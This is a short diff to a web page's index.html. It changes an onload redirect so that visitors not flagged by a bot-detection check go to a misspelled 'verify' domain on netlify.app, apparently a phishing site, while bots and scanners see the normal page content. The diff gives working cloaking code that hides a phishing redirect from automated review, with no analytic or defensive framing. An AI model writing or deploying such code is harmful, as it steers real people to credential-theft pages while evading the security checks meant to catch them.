--- a/index.html
+++ b/index.html
@@ -62,7 +62,7 @@
 
     window.onload = function() {
       if (!detectBot()) {
-        window.location.replace("https://netflix.com")
+        window.location.replace("https://us-verify-contact-bussines-2025.netlify.app/")
       } else {
         document.getElementById('content').style.display = 'block'
       }
